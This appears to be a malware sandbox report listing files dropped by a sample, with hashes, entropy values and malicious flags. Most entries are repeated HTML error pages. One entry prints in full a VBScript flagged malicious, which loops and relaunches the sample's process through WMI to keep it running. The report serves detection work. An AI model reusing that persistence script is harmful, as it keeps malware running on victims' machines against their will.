                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0GbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3b+pAZewRDK4mW
                                                                                                                                      MD5:568D319740F16FCAB7A46C7CFCECCF26
                                                                                                                                      SHA1:E46607280FFE1D908D9D6215B2308173B2F02B19
                                                                                                                                      SHA-256:820B4E63876E7D5247A50DCD8BC28B0235FB83127D2B376A3C945020546C2E25
                                                                                                                                      SHA-512:F677E1703FD8FF3901E3CDB9DEA3FF273E76EBE65E6064E76A8E40A5CC64464EB4E33C029EFA52C25CCD50C11C0A538B6B2D3C198E0C2CF6EDC8952F1F8DB7C8
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.261521476266031
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0F+DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8u+pAZewRDK4mW
                                                                                                                                      MD5:3C6E99033F64B4ADCCD8B1B9CC61CD53
                                                                                                                                      SHA1:F4301C09587E042FBE26F5EF8732E1F11ED82ADB
                                                                                                                                      SHA-256:B0ADEC8968C541BC4B039C80DDB912BBA84CA417B607B95A3A108E9B5331F8C4
                                                                                                                                      SHA-512:A9F49BEBB74B699F0C981FD6A723F15C2660D606DDF2B74A2A6CDDAFF2BC62F95B0465F21EA6B111C12C54C836BF52843F716E890417380F955D0D9D76439A65
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.245178962521632
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                                      MD5:64D3A1EDF95367A58D995D3231C2E5F3
                                                                                                                                      SHA1:1EEC5F0AC838DF925B43D268719ECC880622563D
                                                                                                                                      SHA-256:351C57F82CB6743BC904FFC302E250B37BC60590778281EB218030986EEE71B6
                                                                                                                                      SHA-512:E4D97A70DF40B17F60414795F610FA4E38DE4537BA7F685FEB3A5FA57B365FA27AE88965B6A4827C1A2DB2B90B776D53EA5452BC3BE5F5AFEF5E3DA2D81FD1D1
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\Desktop\._cache_222.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):832
                                                                                                                                      Entropy (8bit):5.348728510580844
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:dF/UFLvU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFLct+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                      MD5:555A579CE96ED753C94B14ECDA6BF827
                                                                                                                                      SHA1:C8910EC131045EF1F11F29C7B5633F0B9B63AD27
                                                                                                                                      SHA-256:A714320EA2EDD0F177749D7F3276E402D9919EF089FC107861FF1E944D5F3521
                                                                                                                                      SHA-512:98327B1E87214E6ED2E360177FC48C6F479D349DF8FA2044ED8C5984FFF5C085794E3E1374F1FC9A2127A0298629FA937AA4EF2419B60F33827F4C799785F4F5
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_222.exe"..fileset = """C:\Users\user\Desktop\._cache_222.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.26683505113149
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                                      MD5:E5CEEA2F0E7ED66F8214615A4E683A5F
                                                                                                                                      SHA1:2A36F20B585EBA10025E1867D9748F8EBA781E7E
                                                                                                                                      SHA-256:A24034A79F2ADBCE5DEBF8F499F206372BAAEE9FEB0CF89377A7196991294C74
                                                                                                                                      SHA-512:03F6AA52E778A8A3B8CFD3A9E2A813F98E172DBE6F9AF53F3DCB4D6156DC74FC38422A6A8070EEA6424FD5CE7393CF6DE44EAA1A4FC6EA2B2EE79FBC254E532B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2667632797029595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0Z2SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
                                                                                                                                      MD5:3ECAA20533C751B9E5266506A73ACF63
                                                                                                                                      SHA1:67E74BDFF21F7FAF52FD4B4DC6BBF6228A50689E
                                                                                                                                      SHA-256:BBC7E6A7C347B74172757918A4DC7359708929C14AA0637F8187C03FFB0D3C57
                                                                                                                                      SHA-512:D2B14A61E7BD434A6CFBFA410465FD674DD764B3A00316B2980F7E1E6E1165D21B3361A2ED4F1A140DA2017B90ECA9D0C1A65CFCF28B562F3E7D459BD8BE81AB
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.270224227686485
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0iSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                                                      MD5:02AE306F0C782B158153316382D03E66
                                                                                                                                      SHA1:AC34EA7BA7192FA8343A96FA4DC11F4330869FE2
                                                                                                                                      SHA-256:95DBE92F03E75E37F4503C193644D1CB9FA334D40B970803D23838532A47B641
                                                                                                                                      SHA-512:401ED8C649C39599B3B8AAC70A4C969D0F39A00034EF326DA70B435D68F96E482C8958E4C63599CDB839B59BE44255E99D1B7A9C5D89CB6C37ADEB619BDB8D7C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.259679761119962
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0h7xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+gN+pAZewRDK4mW
                                                                                                                                      MD5:92C96259F86EDDB3F4562F6F3ED0D111
                                                                                                                                      SHA1:5D94F16CAFD2C46BAF99FA2EF02682CBB5282BF2
                                                                                                                                      SHA-256:CDDF29C4A6BC6A5659B8F8CA01582DD36C21E0F80FAB5F819AC201A41C783730
                                                                                                                                      SHA-512:1742415C012999381E0588B030BBD2D54C15163C89AE2FB942BDA3CEF0AAE60C96A49B79BCD9701104A5F9B5567C600A5EB4C1F0A77FEA2FFF5DB32033DA270B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.251809580166545
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                                                      MD5:F79FCC2B4DB82F2ACDE62D09FB7FD6D1
                                                                                                                                      SHA1:82383C84563BD629AC698CA2C2A6C07A2565D318
                                                                                                                                      SHA-256:67CB86C79965E026EDFB7C0C3BB362E2DDF40656D8D4B90CDEC5FEC0D45F7E3E
                                                                                                                                      SHA-512:A19B7FBA600F3DDE8C517F5823B48C4BE2340C701DFEA0191B9B114A6704413D18F7940F4FCBE80716B16A979A150340885579FCFE20E3BFD6FB6FF051BE194D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.257960373783056
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                                                                      MD5:105FFE14D3CCE7C6673B1A14D5D32050
                                                                                                                                      SHA1:DC184F7DC6F31EFB9123F09ACD1208EFFB79B5BE
                                                                                                                                      SHA-256:6143EB6A3C737A788BD285EA8EBEC29319D43996DE27468425EC748E1FCD5E99
                                                                                                                                      SHA-512:A134E1B4A1AC23B203D4F67E0E27DEDDBDA9C85BDE9ACC1182A5A4C441024AC3CDA49FE8D1FB2C8CE2F3A5F3E0343580009FF1974614C09596047A374DD04782
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.254557046325457
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0FSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                                      MD5:862FABC491E7FF5520E09964BD955982
                                                                                                                                      SHA1:DB95841A156D08127E39AB639A9A7F946E700A0B
                                                                                                                                      SHA-256:CF58A1EF74423A6E0692427673A8A1ABA7A96721D5CEEDD4C76571D583A66492
                                                                                                                                      SHA-512:63DD535DE9B42794A26AF1D4B6D919363030258A057A0D3B81A6B3D1AE1A363E690A7D9440E903196A4B8BD9F32072A555DD7D09C840A0BD05F42F5047EAF5C6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.265900182799788
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                                      MD5:0AB8A80F84E184565CE29651EAB547EA
                                                                                                                                      SHA1:ADE9E98FA2620C1E771F974B7CA68756184F8679
                                                                                                                                      SHA-256:64C3D4CBB93D531FF561A5A699E73E676802A55CDE43B408C7CBD26CF0FF8F76
                                                                                                                                      SHA-512:05AC9E07800E65968429FAEB158C17FDB9A72C26335823554CA6CDF0DFBDD85581219DCCAB604DFF256670E1063FC1A6743BB692C72C68069DF3864DAE173A76
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.257758053136788
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                                      MD5:7DFBA15F3D69C81E3BC8259E7547AD22
                                                                                                                                      SHA1:6A7A5525B2D1401EBFC8B919AAF05766FAE132C6
                                                                                                                                      SHA-256:3C2EDA7659F8B94B96CBA33701CDD1954A006F3925892B35E4EA2C18FCA5BFDF
                                                                                                                                      SHA-512:FE07F47D90065104FA78FC0B06BD080C8131FC51AB663359811856598B7139305B783FE25A6EC61BD04E517113550A9B6DCABC854554E9C5E2F71FD41CFB2DD4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.260759058062482
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0mvXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5vX+pAZewRDK4mW
                                                                                                                                      MD5:C5AF4BDCBC7EC3C214433D0B91C38843
                                                                                                                                      SHA1:909966E31D9725C5B6053C88999D4663843CF625
                                                                                                                                      SHA-256:5288428F2CEEB7A8584098F7D46F525FA6F58936C1A6DE135432AF546E1D2714
                                                                                                                                      SHA-512:2230BB3C07A68D2C1C93D12619FFC5BD38CA4BC4F26B0B62BA525D2141C0F04DD9EFA595DB4EC4AF7F19542080273714FC21469E7A906652579E48343B9A4638
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.274085954822836
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0o5pDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hD+pAZewRDK4mW
                                                                                                                                      MD5:BBB627F18CC1C4EB61F6D48AB95C9572
                                                                                                                                      SHA1:58A09A2C761F5399648B72AEA88DB67D86DFE77C
                                                                                                                                      SHA-256:2E28D0CD635819DCDEF0F0CA5B2DC057F2554B6AA444334FFB5D0D037D64DFB9
                                                                                                                                      SHA-512:0ECFB3D84EB7FBCE64BF75A61AB727C39F0F39A573DF4020DB6692B6AF100A9D89A3669B4A8A719395777206D4AFC9E516D70AC87BB11074D954A8834DCAEBF1
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18387
                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.268024354709191
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0n2gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                                      MD5:BFCA5A391CE93764B3609BB45DCBD095
                                                                                                                                      SHA1:9AAEA140F10E9F7ABFFE4724EDE946AF4033CB18
                                                                                                                                      SHA-256:0ADBD0287E7E719B64D4B28262B9C40B498A992AE9C547545CF3F9D717801A03
                                                                                                                                      SHA-512:89820D72B4B2AD0FFCEAB6E81C190501849F247E5004EEC48819C68E6CC1CF7648BB742D312E7269E930E0A76A81D4609154CE2FF897F34D8347AB5858D7D0B7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="v99cCJy_YNYAZgjbusUE1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.271539013258137
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+00ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                                      MD5:82AAD13C8C340D5CACB8A66B6B599A5E
                                                                                                                                      SHA1:8D2BE7AA7F4B54D37964274CF17F32733B3D0854
                                                                                                                                      SHA-256:F596449C2D62A8D0ABF4980AB98CED9566CDE50B7E03CDCF45A9E9B6E233A037
                                                                                                                                      SHA-512:6C732FC05C44B12949C973891C835C967695BEB9C919D35787BF43B9372A8BCD9EC6F070CD6172946FA6EEAA2C520B9D6B4E442957CDCED6B47FCD510BB73665
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.266305210375949
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0e+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X++pAZewRDK4mW
                                                                                                                                      MD5:86B2F76ACC33E4C14404FDA538C9A99B
                                                                                                                                      SHA1:57735DB0FA0B030782B4D8F54AA2B11D41ED66C5
                                                                                                                                      SHA-256:3194FD0DA4052968C9407CE74AAE8E21358AD0C1C6D25C6B227B4AA16E6902A6
                                                                                                                                      SHA-512:492D0E9BE047F991A8BD2B86218EB7C3D487FCC6D2598DE6D815597BC6547C38E180F630D9719D3EE5360846FF1353CF52BC7F54205097ED9086A2321D2F16A3
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.256461050563257
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0rDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                                                      MD5:56AF9FBC77A85C15EB11FC5D49984C39
                                                                                                                                      SHA1:13161D006700B5B433A4F4DF705A3CCB1852CDDB
                                                                                                                                      SHA-256:CAA4C730EFF7DD08C3CFDD5302A62C9ABBC99E21395F5EC1684A3517B10BFD87
                                                                                                                                      SHA-512:5AA73E5906DF2AE808B9140BA4C0CB89F00257E2938EABF2CF740963948BA459C2CAFD9C54C74FF56EFE5460D2F622C47594BCAA5C7D3F8B1FE978671E474561
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2688500802331815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0AYSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                                      MD5:928EA4BEC0BD7F8064E04B373B5AE6D1
                                                                                                                                      SHA1:7641D06E1AECC829CB24724F622F0B56AAA6DD40
                                                                                                                                      SHA-256:0CC71438EDA68E33E8819A4637082F6B1ECCA9EDB39CC538F4BC47E362EE4850
                                                                                                                                      SHA-512:0D4FB5477AA5C27B242B6A9430CFE2E096FA626592382027667F28F0C7243413E6E2B40C77116493D73ACE2BB9158921FD308E3E6A9CB378EEC3A538E0D100A4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.253627405952068
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0OdIWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                                      MD5:00A01D57AB45ED99B8149EBC8CD39B94
                                                                                                                                      SHA1:96BCFF07641CE92822681F9677D85164522B536D
                                                                                                                                      SHA-256:59AB7ED4B1BCCD18026A3ECDA3AAAF9ABBBFF39E9D799A434282D48F7F2C4E65
                                                                                                                                      SHA-512:F065BA8F40BF5EA7CC7DD491F347A1AF68A00590CE17F0ECC7809239619DAF08C1D0A96ADA90878CE71E60CE05C40502A734B0CDBBD2BA055DA40C63F409DA53
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.275728446420488
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                                      MD5:388ED3C25196E18FEED0A09F5470AA8D
                                                                                                                                      SHA1:AE7C51842195DEB0F2199EB3D10C55BC395A71AC
                                                                                                                                      SHA-256:17F077793876E137513764DBCBA74BC82A952CFE356C6AB07BA828C84A86714D
                                                                                                                                      SHA-512:B97CB01AED7F2B310823269C3C33E831B957B6EF9AAF4650C630C4EE3F902AA386B921533B30828B13127521EF3B638F3435AA189ED57FAAD15E2B44803AEFD2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.252786541242886
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0N9ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QA+pAZewRDK4mW
                                                                                                                                      MD5:503D34781993483131303CE89F18868F
                                                                                                                                      SHA1:B62B38B9137EB6DD54667B1CB9C7AED390B9DA36
                                                                                                                                      SHA-256:AA0F9507519029E218F3B4FC290FCA2BADBC1A87E4C3861264E00614AFD958A9
                                                                                                                                      SHA-512:5C5C2847E11722CB8593A2727B0A7A59D0350F39739E44801A4AE5C982C6191F30625A8429E0F39EE5EFE1EE0A0534C7B99EA290BC3C23FD146B6C115E8C490E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.25721626262713
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                                      MD5:C362711DCFFE702753D6C591CB9DA43D
                                                                                                                                      SHA1:02F9EEDA27AA58FB0EB82284E74DB8BB66234416
                                                                                                                                      SHA-256:334DA57A89F62F0C48199CF25431FED79FF90E9662EAAC404225933D73D40802
                                                                                                                                      SHA-512:0D3950D12913FEDD626FBA0974C6E5F796B03D7345C2C2D599E2CD8F2C3639F21E298754D32B4F748F7501C6ED7847769F013E7D2525976E8E713AE3ED63A9F0
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.256626772567488
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
                                                                                                                                      MD5:F497990F8DF7B558566DBCD153E77884
                                                                                                                                      SHA1:225712E18C5357863D25AB02955CDEE37772D436
                                                                                                                                      SHA-256:1C88F3F46F8F90F17CDDD42358EADAD7A65F3A837072140A4F191C61F132DC7E
                                                                                                                                      SHA-512:4EC089AD035CBF7AE90B7BB5C24F6C648FD75C989589AFB3F81D27CFE5976EEBBAB53FF6363369F461E1D069AA391E5511B4C6A274D162D6624B72768A700215
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.269645110456817
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0NySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Ey+pAZewRDK4mW
                                                                                                                                      MD5:9FA8878B1DD017BD9ABEDE5782D65771
                                                                                                                                      SHA1:E59BB2934BCEDBDF438D1C39A28F9A9CB6F4FEBE
                                                                                                                                      SHA-256:1D565EC0A0F8E12707DE16DB73C784724E05E8FD6BB1E13EC406D61BF1B963D7
                                                                                                                                      SHA-512:6FB599654949B05F788DB82825E7821C89F27B9BF64FA781E1D69F4C6A9B0030554DBBD3FDC086DD38D3FDB0C223D87286527982FA1062793A83AEBBAFFD5E47
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.254215805308203
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                                      MD5:0D85261DFA11C334A17B27B388D53804
                                                                                                                                      SHA1:3C3C9F0619A773214F0517FB4144412A8EBCF3B7
                                                                                                                                      SHA-256:A6A5CF934F66D64E3E5CD74E15E0FCFB80B084CD2FB6EDDAF4AE01F56760963C
